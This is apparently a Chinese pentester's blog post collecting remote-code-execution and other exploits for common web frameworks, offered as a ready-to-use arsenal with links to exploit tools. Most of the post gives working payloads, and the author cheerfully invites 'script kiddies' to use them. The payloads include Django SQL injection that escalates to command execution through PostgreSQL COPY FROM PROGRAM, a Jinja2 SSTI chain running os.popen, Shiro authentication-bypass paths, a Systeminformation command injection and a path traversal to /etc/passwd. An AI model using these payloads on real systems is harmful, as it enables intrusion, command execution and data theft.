前言

为什么突然跳到这个框架安全得话题,就现在的安全意识水平,一般都会升级,或者是通报后及时整改修复,框架直接RCE的可能性小之又小,却没成想我手上真的出现了这样的资产。

本篇文章主要分享总结一下常见框架的rce姿势,或者是一些一键脚本,前人栽树后人乘凉嘛,脚本小子也还挺快乐的不是吗?

本篇文章会同步及时更新,好比一个仓库,以便师傅们及时查阅。

不废话,直接开水(手动狗头)。

思维导图

先来波思维导图(图是小迪的,借来用用哈)

基础知识

中间件及框架列表:

IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic,JBoos,WebSphere,Jenkins ,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,Flask,jQuery等

1、开发框架-PHP-Laravel-Thinkphp

2、开发框架-Javaweb-St2-Spring

3、开发框架-Python-django-Flask

4、开发框架-Javascript-Node.js-JQuery

5、其他框架-Java-Apache Shiro&Apache Sorl

常见语言开发框架:

PHP:Thinkphp Laravel YII CodeIgniter CakePHP Zend等

JAVA:Spring MyBatis Hibernate Struts2 Springboot等

Python:Django Flask Bottle Turbobars Tornado Web2py等

Javascript:Vue.js Node.js Bootstrap JQuery Angular等

PHP Thinkphp&Laravel

Laravel

CVE-2021-3129 RCE

Laravel <= 8.4.2

https://github.com/zhzyker/CVE-2021-3129

https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP

Thinkphp-3.X RCE-5.X RCE

ThinkPHP是一套开源的、基于PHP的轻量级Web应用开发框架

Thinkphp专检

https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection

https://github.com/Lotus6/ThinkphpGUI/releases/tag/1.3

**PHPUnit **

eval-stdin.php 远程命令执行漏洞 CVE-2017-9841

/phpunit/src/Util/PHP/eval-stdin.php
POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host:
Content-Length: 21
Accept-Encoding: gzip

JAVA Spring&Struts2&Shiro&

Struts2

武器库-st2专检

文末获取下载连接

S2-062 CVE-2021-31805

https://github.com/YanMu2020/s2-062

Spring

SpringBoot 相关漏洞学习资料,利用方法和技巧合集

https://github.com/LandGrey/SpringBootVulExploit

SpringBoot

https://github.com/0x727/SpringBootExploit

https://github.com/WhiteHSBG/JNDIExploit

Spring-cloud-function

https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE

Spring_Cloud_Gateway

https://github.com/An0th3r/CVE-2022-22947-exp

Apache Shiro

判断:大多会发生在登录处,返回包里包含remeberMe=deleteMe字段

漏洞:https://avd.aliyun.com/search?q=shiro

Apache Shiro <= 1.2.4 默认密钥致命令执行漏洞  CVE-2016-4483

Apache Shiro < 1.3.2 验证绕过漏洞 CVE-2016-2807

Apache Shiro < 1.4.2 cookie oracle padding漏洞 CVE-2019-12442

Apache Shiro < 1.5.2 验证绕过漏洞 CVE-2020-1957

Apache Shiro < 1.5.3 验证绕过漏洞 CVE-2020-11989

Apahce Shiro < 1.6.0 验证绕过漏洞 CVE-2020-13933

Apahce Shiro < 1.7.1 权限绕过漏洞 CVE-2020-17523

CVE_2016_4437 Shiro-550+Shiro-721

CVE-2020-11989

Poc:

/admin/%20

影响范围:Apache Shiro < 1.7.1

https://github.com/jweny/shiro-cve-2020-17523

CVE-2020-1957

Poc

/xxx/..;/admin/

影响范围:Apache Shiro < 1.5.3

武器化文末获取

Apache Solr

Apache Solr Exploits 🌟

https://github.com/Imanfeng/Apache-Solr-RCE#cve-2017-12629

CVE-2019-0193

CVE-2019-0192

CVE-2019-17558

CVE-2017-12629

CVE-2019-12409

CVE-2020-13957

CVE-2018-8026

CVE-2021-27905 Apache Solr 文件读取&SSRF

https://github.com/murataydemir/CVE-2021-27905

Python Django&Flask&MotionEye

Django

CVE_2019_14234

单引号已注入成功,SQL语句报错:

/admin/vuln/collection/?detail__a%27b=123

创建cmd_exec:

/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcreate%20table%20cmd_exec(cmd_output%20text)--%20

调用cmd_exec执行命令:

/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_exec%20FROM%20PROGRAM%20%27ping hqrwsz.dnslog.cn%27--%20

CVE-2020-7471

https://github.com/huzaifakhan771/CVE-2020-7471-Django

CVE-2021-35042

目录:

/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@basedir)),1)%23

版本:

/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20version())),1)%23

数据库名:

/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20database())),1)%23 

Flask Jinja2 SSTI

Flask是一个使用Python编写的轻量级Web应用框架。其WSGI工具箱采用Werkzeug ,模板引擎则使用Jinja2 .

?name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__(%22os%22).popen(%22id%22).read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D

MotionEye

信息泄露漏洞 CVE-2022-25568

MotionEye <= 0.42.1

/config/list

JavaScript Jquery&Node

jQuery

jQuery Upload File <= 4.0.2 中的任意文件上传

curl -F "myfile=@php.php" "url"

XSS payload

https://github.com/mahp/jQuery-with-XSS

Node.js

cve_2021_21315

Systeminformation < 5.3.1

https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC

POC

/api/getServices?name[]=$(echo -e 'ckcsec' > test.txt)

cve_2017_14849

GET:

/static/../../../a/../../../../etc/passwd